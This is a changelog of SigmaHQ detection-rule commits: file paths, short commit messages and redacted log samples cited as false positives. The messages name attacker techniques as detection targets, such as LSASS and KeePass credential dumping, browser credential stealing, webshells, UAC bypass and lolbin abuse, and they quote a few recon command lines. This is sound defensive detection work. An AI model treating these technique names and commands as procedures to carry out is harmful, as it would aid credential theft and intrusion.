SigmaHQ/sigma

tools/config/winlogbeat-modules-enabled.yml
Add the 2 used in firewall-ad rules
=> Add missing fields

rules/windows/builtin/application/win_av_relevant_match.yml, rules/windows/file_event/file_event_win_script_creation_by_office_using_file_ext.yml, rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml, rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml, rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml
(base64 encoded mal-strings available in Raccine)
=> Fix FPs and 2 new Rules

rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml, rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml, rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml, tools/config/elk-windows.yml, tools/config/elk-winlogbeat-sp.yml, tools/config/elk-winlogbeat.yml, tools/config/fireeye-helix.yml, tools/config/generic/windows-services.yml, tools/config/logpoint-windows.yml, tools/config/logstash-windows.yml, tools/config/powershell.yml, tools/config/splunk-windows.yml, tools/config/sumologic.yml, tools/config/thor.yml, tools/config/winlogbeat-modules-enabled.yml, tools/config/winlogbeat-old.yml, tools/config/winlogbeat.yml, tools/config/zircolite.yml
Some roles with builtin 'Microsoft-Windows-Bits-Client/Operational' Channel
=> Add Bits-Client rules

rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml
Update another command line of Get-WmiObject (gwmi)
=> Update another command line of Get-WmiObject (gwmi)

rules/windows/registry_event/registry_event_removal_com_hijacking_registry_key.yml, rules/windows/registry_event/registry_event_taskcache_entry.yml
FP with fresh windows 11 installation with Office 2019
=> Fix Windows11-Office FP

rules/windows/registry_event/registry_event_asep_reg_keys_modification_currentversion.yml, rules/windows/registry_event/registry_event_asep_reg_keys_modification_currentversion_nt.yml, rules/windows/registry_event/registry_event_asep_reg_keys_modification_office.yml
=> OfficeClickToRun FP

tools/config/splunk-windows.yml
Fix missing WinEventLog
close #2772
=> Add missing WinEventLog prefix

rules/windows/registry_event/registry_event_asep_reg_keys_modification_common.yml, rules/windows/registry_event/registry_event_asep_reg_keys_modification_wow6432node.yml, rules/windows/registry_event/registry_event_outlook_registry_todaypage.yml, rules/windows/registry_event/registry_event_persistence_search_order.yml, rules/windows/registry_event/registry_event_removal_com_hijacking_registry_key.yml
Last FP from win11_client evtx-baseline
=> Office Installation FP

rules/windows/builtin/security/win_invoke_obfuscation_via_rundll_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_use_rundll32_services_security.yml, rules/windows/builtin/system/win_invoke_obfuscation_via_compress_services.yml, rules/windows/builtin/system/win_invoke_obfuscation_via_use_mshta_services.yml, rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml
Try to remove regex when not usefull
=> Refactor regex

rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml, rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml, rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml, rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml, rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml, rules/windows/process_creation/proc_creation_win_apt_sofacy.yml, rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml, rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml, rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml, rules/windows/process_creation/proc_creation_win_dinjector.yml, rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml, rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml, rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml, rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml, rules/windows/process_creation/proc_creation_win_hack_rubeus.yml, rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml, rules/windows/process_creation/proc_creation_win_malware_dtrack.yml, rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml, rules/windows/process_creation/proc_creation_win_renamed_powershell.yml, rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml, rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml, rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml, rules/windows/process_creation/proc_creation_win_susp_double_extension.yml, rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml, rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml, rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml
and some minor tweaks. One FP tuning.
=> Increase Rule status

rules/windows/file_event/file_event_win_susp_dropper.yml
Set to low as even if  Malware does it , I think many FP will trigger.
=> Add file_event_win_susp_dropper

rules/windows/process_creation/proc_creation_win_network_scan_loop.yml
For https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md
=> Redcannary t1018

rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml
From https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
=> Add proc_creation_win_wmic_remote_command

rules/windows/etw/file_rename/file_rename_win_not_dll_to_dll.yml, rules/windows/file_event/file_event_win_susp_dropper.yml, rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml
Windows Update FP found with aurora
=> WindowsUpdate FP

.github/workflows/sigma-test.yml
=> Replaced sigmatools tests with sigma-cli check

README.md, tools/config/hawk.yml, tools/sigma/backends/hawk.py
backend update, also adds hawk.io to readme
=> Merging latest changes for HAWK.IO

rules/application/antivirus/av_printernightmare_cve_2021_34527.yml
Example FP
```
Mar 16 13:53:45 redacted.computer.name CEF:0|Symantec|ICDx|1.0|1|[Antivirus advanced heuristic detection submission] File submitted to Symantec for analysis. File : 'C:\Windows\System32\spool\drivers\x64\PCC\prnms002.inf_amd64_8af75fd8064b5524.cab>>Amd64\FXSWZRD.DLL', Size (bytes): 3493.|1|act=4 cat=3 deviceExternalId=569854C0CEC112669AF7D2B4493B1790 dtz=+06:00 dvc=10.1.2.3 dvchost=REDACTED dvcmac=55-3A-1B-E3-94-07 rt=1647456803964 deviceCustomDate1=1647456803964 deviceCustomDate1Label=Logged Time start=1647450997590 agt=10.21.0.1
```
=> Filtering of symantec submission for analysis

rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml
fp:
```
2022-03-17 16:59:45 host.name.redacted Sysmon: 1: Process Create | RuleName=technique_id=T1027,technique_name=Obfuscated Files or Information | UtcTime=2022-03-17 16:59:45.091 | ProcessGuid={8eb39540-6901-6233-d6c9-000000004200} | ProcessId=6780 | Image=D:\Program Files\Tasktop\jre\bin\java.exe | FileVersion=8.42.0.23 | Description=Zulu Platform x64 Architecture | Product=Azul Zulu 8 | Company=Azul Systems Inc. | OriginalFileName=java.exe | OriginalCommandLine="D:\Program Files\Tasktop\keycloak\bin\/../../jre\bin\java" -Dprogram.name=standalone.bat -Xms64M -Xmx512M -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=org.jboss.byteman "-Dorg.jboss.boot.log.file=D:\ProgramData\Tasktop\keycloak\standalone\log\server.log" …
```
=> Adding filter for java  tasktop

rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml
As the rule is for "Delete File"
=> posh_ps_remove_item_path fix registry FP

rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml, rules/windows/registry_event/registry_event_disable_fonction_user.yml, rules/windows/registry_event/registry_event_hide_fonction_user.yml, rules/windows/registry_event/registry_event_nopolicies_user.yml
For T1112, I have make a big one, but finaly split by "logic" .
=> Redcannary

rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml
Adds filter for system32 for rundll32
=> Fp missing system32 dir rundll32 with invalid extension

rules/windows/process_creation/proc_creation_win_webshell_detection.yml, rules/windows/process_creation/proc_creation_win_webshell_hacking.yml, rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml, rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
otherwise tests/test_rules.py will fail
=> fix: single list element

rules/windows/builtin/system/win_susp_service_installation.yml, rules/windows/builtin/system/win_susp_service_installation_folder_pattern.yml, rules/windows/builtin/system/win_susp_service_installation_script.yml
Fixes issue from https://github.com/SigmaHQ/sigma/issues/2848
=> Fix win_susp_service_ rules causing Sigmac error

rules/windows/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml, rules/windows/registry_add/registry_add_mal_netwire.yml, rules/windows/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml, rules/windows/registry_event/registry_event_crashdump_disabled.yml, rules/windows/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml, rules/windows/registry_set/registry_set_comhijack_sdclt.yml, rules/windows/registry_set/registry_set_cve_2020_1048_new_printer_port.yml, rules/windows/registry_set/registry_set_dhcp_calloutdll.yml, rules/windows/registry_set/registry_set_enabling_cor_profiler_env_variables.yml, rules/windows/registry_set/registry_set_globalflags_persistence.yml, rules/windows/registry_set/registry_set_mal_blue_mockingbird.yml, rules/windows/registry_set/registry_set_new_application_appcompat.yml, rules/windows/registry_set/registry_set_office_security.yml, rules/windows/registry_set/registry_set_outlook_registry_webview.yml, rules/windows/registry_set/registry_set_rdp_settings_hijack.yml, rules/windows/registry_set/registry_set_uac_bypass_eventvwr.yml, rules/windows/registry_set/registry_set_uac_bypass_sdclt.yml
Change registry_event to new one when find information in the references
=> Update Registry logsource

rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml
```
2022-03-26 18:22:45 redacted.host.name Sysmon: 1: Process Create | RuleName=technique_id=T1218,technique_name=Signed Binary Proxy Execution | UtcTime=2022-03-26 18:22:45.503 | ProcessGuid={67692E47-59F5-623F-6814-00000000B400} | ProcessId=10208 | Image=C:\Windows\System32\msiexec.exe | FileVersion=5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810) | Product=Windows Installer - Unicode | Company=Microsoft Corporation | OriginalFileName=msiexec.exe | CommandLine=C:\Windows\System32\MsiExec.exe /Y C:\Windows\CCM\DcmSUMProvider.dll |
```
=> Adding FP filter for ccm

rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml
Mavinject now has its own subtechnique
https://attack.mitre.org/techniques/T1218/013/
=> added resource and improved MITRE Subtechnique

rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml
Change to `low` as get FP with check-baseline-win10.
=> Conhost ForceV1

.github/workflows/known-FPs.csv, .github/workflows/sigma-test.yml, rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml, rules/windows/registry/registry_event/registry_event_runonce_persistence.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml, rules/windows/registry/registry_set/registry_set_change_security_zones.yml, rules/windows/registry/registry_set/registry_set_persistence_search_order.yml, rules/windows/registry/registry_set/registry_set_set_servicedll.yml, rules/windows/registry/registry_set/registry_set_taskcache_entry.yml, rules/windows/sysmon/sysmon_config_modification_error.yml, tests/check-baseline-local.sh
=> workflow: add checks against Windows 11 baseline

rules/windows/etw/file_access/file_access_win_browser_credential_stealing.yml
Test done with aurora no sysmon.
from:
- https://twitter.com/virusbtn/status/1512447683751038984
- https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users
=> Browser Credential Stealing

rules/windows/process_creation/proc_creation_win_susp_netsh_command.yml, rules/windows/process_creation/proc_creation_win_susp_network_command.yml
Expand procedure level coverage such as "run cmd.exe /c netsh firewall show state & netsh firewall show config".
=> Update Netsh Firewall Enumeration

rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml, rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml, rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml
Addresses issue #2905 by updating title and description of affected rules.
=> fix: copy / paste issues

rules/windows/file_event/file_event_win_cve_2022_24527_lpe.yml
https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
=> CVE-2022-24527 Microsoft Connected Cache LPE

rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml
=> mitre tags:  Persistence  (T1053) ,(T1053.005)

rules/windows/builtin/system/win_quarkspwdump_clearing_hive_access_history.yml, rules/windows/builtin/system/win_susp_sam_dump.yml, rules/windows/process_creation/process_creation_win_arbitrary_shell_execution_via_settingcontent.yml, rules/windows/process_creation/process_creation_win_asr_bypass_via_appvlp_re.yml
https://github.com/SigmaHQ/sigma/issues/2917
=> refactor: proposed changes from issue #2917

rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml
[T1218.007](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md)
Atomic Test 1 Executes an MSI containing embedded JScript 
Atomic Test 2 Execute Local MSI file with embedded VBScript
=> Add proc_creation_win_msiexec_embedding

rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml
https://twitter.com/kagancapar/status/1515219358234161153
[kagancapar POC](https://github.com/kagancapar/CVE-2022-29072)
Get the cmd from help but no privilege escalation so I have missed something...
=> add proc_creation_win_7zip_cve_2022_29072

.github/workflows/known-FPs.csv, .github/workflows/sigma-test.yml, rules/windows/file_event/file_event_win_susp_adsi_cache_usage.yml, rules/windows/image_load/image_load_in_memory_powershell.yml, rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml, rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml, rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml, rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml, rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml, rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml, rules/windows/registry/registry_set/registry_set_set_servicedll.yml, rules/windows/registry/registry_set/registry_set_taskcache_entry.yml, tests/check-baseline-local.sh
Also bump evtx-baseline version to v0.6 (new baselines and faster runtime)
=> workflow: add checks against Windows 2022 domain controller baseline

rules/windows/builtin/system/win_ntfs_vuln_exploit.yml
Find a usefull ref 
`C:\:$i30:$bitmap` didn't work on my windows uptodate
=> win_ntfs_vuln_exploit add a ref

rules/windows/create_remote_thread/sysmon_password_dumper_keepass.yml
Add rule to detect KeePass password dumping by creating a remote thread
=> rule: KeePass password dumping

rules/windows/file_event/file_event_win_susp_get_variable.yml
=> Colibri malware

rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml, rules/windows/process_creation/proc_creation_win_msiexec_dll.yml
fill some gaps in  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md
=> Redcannary T1218.007

rules/windows/network_connection/net_connection_win_suspicious_outbound_mobsync_connection.yml
New rule for suspicious network connections from Microsoft Sync Center (basically not to local network)
=> New rule for suspicious network connections from Microsoft Sync Center

rules/windows/file_access/file_access_win_browser_credential_stealing.yml, rules/windows/process_creation/proc_creation_win_susp_gpresult.yml, rules/windows/registry/registry_set/registry_set_creation_service_temp_folder.yml
Some tests :
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md#atomic-test-8---decrypt-mozilla-passwords-with-firepwdpy
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md#atomic-test-29---kill-antimalware-protected-processes-using-backstab
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-1---display-group-policy-information-via-gpresult
=> Windows Redcannary test

rules/windows/builtin/security/win_account_backdoor_dcsync_rights.yml
```
2022-05-05 16:01:38 dns.host.com Security-Auditing: 5136: A directory service object was modified. | OpCorrelationID={c5d6d8bd-948b-43f5-a2d5-24b6c67d0681} | AppCorrelationID=- | SubjectUserSid=S-1-5-18 | SubjectUserName=SYSTEM | SubjectDomainName=NT AUTHORITY | SubjectLogonId=0x154b2eb68 | DSName=redacted.com | DSType=Active Directory Domain Services | ObjectDN=DC=204,DC=214.9.10.in-addr.arpa,cn=MicrosoftDNS,DC=DomainDnsZones,DC=redacted,DC=com | ObjectGUID={5eacfb5f-166f-4593-a8cd-b6cf584d30ff} | ObjectClass=dnsNode | AttributeLDAPDisplayName=nTSecurityDescriptor | AttributeSyntaxOID=2.5.5.15 | AttributeValue=O:S-1-5-21-2145910891-1680243707-1384523041-27294G:DUD:AI(A;;CCDCLCSWRPWPDTCRSDRCWDWO;;;S-1-5-21-2145910891-1680243707-1384523041-27294)(A;;SWWPRC;;;AU)(A;CIID;CCDCLCSWRPWPDTCRS …
```
=> Removing FP of dnsNode updates. Not related to account access

rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml
https://gist.github.com/d4rk-d4nph3/8c5ace089c16b73a17346cf5041b1fe7#syslog-event-logs
=> Added rule for Nimbuspwn exploitation

rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml, rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml, rules/windows/process_creation/proc_creation_win_tool_nircmd.yml
Added more use cases of command execution based on the documentation of NirCmd and AdvancedRun
=> Update NirCmd and AdvancedRun rules

rules/windows/process_creation/proc_creation_win_lolbas_replace.yml, rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml, rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml
Make some tests on [LOLBAS-Project](https://github.com/LOLBAS-Project/LOLBAS/pull/213)
=> Some Lolbin

rules/windows/process_creation/proc_creation_win_regini.yml, rules/windows/process_creation/proc_creation_win_regini_ads.yml, rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml
- Updated regini rules to take into consideration OriginalFileName
- Added another function to execute click-once via rundll32 (dfshim.dll)
=> Small Update

rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml, rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml
Find only 2 rules without status
=> Add status

rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml, rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml
As create_remote_thread only comes out in case of success I made a simpler one too
=> ttdinject lolbin

rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml
https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
=> Fix on Powershell MsXml COM object

tests/test_rules.py
see new type "similar" - https://github.com/SigmaHQ/sigma/wiki/Specification#rule-identification
=> added 'similar' related type to test_rules script

rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml
=> FP: filtering out Amaazon AWS header

rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml
context related to the behavior: https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool/
original repo of the project: https://github.com/ch2sh/Jlaive
=> New sigma rule to detect the use of Jlaive antivirus defense evasion

rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
Hi,
I have check all the rule this is the only left with multi value cast.
Specification: [All values are treated as case-insensitive strings](https://github.com/SigmaHQ/sigma/wiki/Specification#general)
Issue : #3036
=> Fix duplicate cast

rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml, rules/windows/process_creation/proc_creation_win_lolbas_cl_mutexverifiers.yml
=> Add lolbas cl script

rules/linux/process_creation/proc_creation_lnx_at_command.yml
https://attack.mitre.org/resources/updates/
`In this release we have replaced the Enterprise Sub-Techniques [Boot or Logon Autostart Execution: Plist Modification (T1547.001)](https://attack.mitre.org/versions/v10/techniques/T1547/001/) with [Plist File Modification (T1647)](https://attack.mitre.org/techniques/T1647/) and [Scheduled Task/Job: At (Linux)(T1053.001)](https://attack.mitre.org/versions/v10/techniques/T1053/001/) was incorporated into [Scheduled Task/Job: At (T1053.002)](https://attack.mitre.org/techniques/T1053/002/) in to better reflect adversary behavior.`
=> Mitre tag change

rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml
example:
```
2022-05-26 14:10:39 REDACTED Sysmon: 3: Network connection detected | RuleName=technique_id=T1036,technique_name=Masquerading | UtcTime=2022-05-26 14:10:37.977 | ProcessGuid={5874a3f6-8a5a-628f-b701-000000003000} | ProcessId=8232 | Image=C:\Users\Public\IBM\ClientSolutions\Start_Programs\Windows_i386-32\acslaunch_win-32.exe | User=REDACTED | Protocol=tcp | Initiated=true | SourceIsIpv6=false | SourceIp=127.0.0.1 | SourceHostname=REDACTED | SourcePort=61027 | SourcePortName=- | DestinationIsIpv6=false | DestinationIp=127.0.0.1 | DestinationHostname=REDACTED | DestinationPort=37373 | DestinationPortName=- | pid=3224 | level=0 | sys_version=5 | category=Network connection detected (rule: NetworkConnect) | op=Info | Microsoft-Windows-Sysmon/Operational=true | …
```
=> Fp net connection from desktop ibm

rules/windows/process_creation/proc_creation_win_susp_execution_path.yml
example:
```
2022-05-26 14:10:34 REDACTED Sysmon: 1: Process Create | RuleName=technique_id=T1036,technique_name=Masquerading | UtcTime=2022-05-26 14:10:34.422 | ProcessGuid={5874a3f6-8a5a-628f-b701-000000003000} | ProcessId=8232 | Image=C:\Users\Public\IBM\ClientSolutions\Start_Programs\Windows_i386-32\acslaunch_win-32.exe | FileVersion=8.0.6.0 | Description=Launch of IBM i Access Client Solutions | Product=IBM(R) i Access Client Solutions | Company=IBM Corporation | OriginalFileName=acslaunch | OriginalCommandLine="C:\Users\Public\IBM\ClientSolutions\Start_Programs\Windows_i386-32\acslaunch_win-32.exe" "C:\Users\REDACTED \Desktop\ERP1.hod" | CommandLine=C:\Users\Public\IBM\ClientSolutions\Start_Programs\Windows_i386-32\acslaunch_win-32.exe C:\Users\REDACTED \Desktop\ERP1.hod | …
```
=> FP: IBM ClientSolutions is valid directory

rules/windows/file_event/file_event_win_webshell_creation_detect.yml
Example
```
2022-05-24 22:24:44  REDACTED Sysmon: 11: File created | RuleName=- | UtcTime=2022-05-24 22:24:44.403 | ProcessGuid={f4b6f253-acc4-627d-0100-000000007501} | ProcessId=4 | Image=System | TargetFilename=D:\inetpub\wwwroot\LenderCompliance\Forms\CovenantCalculationCtrlForm.aspx | CreationUtcTime=2022-05-19 20:24:51.262 | pid=1984 | level=0 | sys_version=2 | category=File created (rule: FileCreate) | op=Info | Microsoft-Windows-Sysmon/Operational=true | key=0x8000000000000000 | id=5028660 | app="C:\Windows\sysmon64.exe" | tid=4956 | channel="Microsoft-Windows-Sysmon/Operational" | pid_user="NT AUTHORITY\SYSTEM" | sid=S-1-5-18 | account type=User | type=notice(4) 
```
=> FP: System image (driver) restoring files. Valid behavior

rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
=> Follina — a Microsoft Office code execution vulnerability

rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml, rules/windows/registry/registry_set/registry_set_disable_fonction_user.yml
- Updated "proc_creation_win_susp_wmic_security_product_uninstall" with more AV and CLI variants.
- Updated "egistry_set_disable_fonction_user" with more interesting registry locations
=> Rules Update

rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml
Just missing a test in https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md
=> Add posh_ps_get_gpo

rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml
https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ 
get the `rundll32.exe user32.dll, LockWorkStation`
Split function to add some more easily
=> Add proc_creation_win_susp_rundll32_user32_dll

rules/web/web_java_in_access_log.yml
Try to add a generic Java payload detection rule in web access log.
=> add web_java_in_access_log

rules/windows/file_event/file_event_win_susp_winword_startup.yml
The folder is empty in all my VM so don't know for FT 😞 
https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/
C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\ket.t  :
=> Add file_event_win_susp_winword_startup

rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml, rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml, rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml, rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml, rules/windows/process_creation/proc_creation_win_susp_cdb.yml, rules/windows/process_creation/proc_creation_win_susp_dxcap.yml
Added some new rules for missing lolbins.
=> New/Update LOLBIN Rules

rules/windows/file_event/file_event_win_susp_diagcab.yml, rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml
No POC to try.
https://twitter.com/j00sean/status/1533880296642330624
=> Add file_event_win_susp_diagcab

rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml, rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml, rules/windows/process_creation/proc_creation_win_mstsc.yml, rules/windows/process_creation/proc_creation_win_susp_acccheckconsole.yml, rules/windows/process_creation/proc_creation_win_susp_curl_download.yml, rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml, rules/windows/process_creation/proc_creation_win_susp_gup_download.yml, rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml, rules/windows/process_creation/proc_creation_win_susp_wsl_lolbin.yml
- Added new rules for using GUP as a lolbin/persistence
- Small update to  "AccCheckConsole" (Added original filename)
=> GUP LOLBIN Rules + Update AccCheckConsole Rule

rules/windows/file_event/file_event_win_outlook_newform.yml, rules/windows/file_event/file_event_win_winword_cve_2021_40444.yml, rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml, rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml, rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml, rules/windows/process_creation/proc_creation_win_susp_psloglist.yml, rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml, rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml, rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml
- Added missing "endswith" modifier for some rules
- Created a rule for the usage of Sysinternals PsService. Which is a tool very similar to "sc.exe"
- Created a rule for "OpenConsole" Lolbin (https://twitter.com/nas_bench/status/1537563834478645252)
- Updated the "PsLogList" rule and added more cases to the "Suspicious Shells Spawn by WinRM" rule
=> Small Updates and New Rules

tools/sigma/backends/mdatp.py
This is an updated pull request from the previously [canceled](https://github.com/SigmaHQ/sigma/pull/3125) one. It is designed to resolve issue [3120](https://github.com/SigmaHQ/sigma/issues/3120). Local testing does not present any issues, but let me know if you run into any on your end.
=> Adding a mapping check to escape slashes in KQL

rules/windows/builtin/security/win_susp_rc4_kerberos.yml
$ is a the end in "normal" event
close #3067
=> Fix ServiceName

rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml
https://redcanary.com/blog/chromeloader/
=> Add proc_creation_win_chrome_load_extension

rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md
=> Add registry_set_timeproviders_dllname

rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml, rules/windows/registry/registry_add/registry_add_mal_netwire.yml, rules/windows/registry/registry_add/registry_add_mal_ursnif.yml, rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml, rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml, rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml, rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml, rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml, rules/windows/registry/registry_set/registry_set_disable_system_restore.yml, rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml, rules/windows/registry/registry_set/registry_set_hide_file.yml, rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml, rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml, rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml, rules/windows/registry/registry_set/registry_set_office_security.yml, rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml, rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml, rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml, rules/windows/registry/registry_set/registry_set_rdp_settings_hijack.yml, rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml
Add missing EventType in some registry rules.
registry_event need deeper analysis.
=> Add missing EventType

rules/windows/dns_query/dns_query_win_ufile_io.yml, rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml, rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml, rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml
3 new rules and 1 rules was "fixed/cleaned up"
=> rule cleanup and new rules

rules/windows/process_creation/proc_creation_win_msra_process_injection.yml
New experimental rule designed to find process injection via Msra.
=> Msra.exe process injection rule

rules/windows/registry/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml
Make it more generic.
Remove `keywords` search
Close #2088
=> More generic registry_event_cve_2021_31979_cve_2021_33771_exploits

rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml, rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml
Adding new rule from Azure AD SecOps guide
=> Added device registration w/o MFA sigma rule

rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
More generic than the ransomware as there are many channel 😄
=> Add registry_set_disable_winevt_logging

rules/windows/process_creation/proc_creation_win_susp_parents.yml
https://github.com/SigmaHQ/sigma/issues/3208
=> fix: FPs with notepad as parent

rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml, rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml
Comment the warning section to pass rule check
=> Fix Error in logsource

rules/windows/builtin/security/win_account_discovery.yml
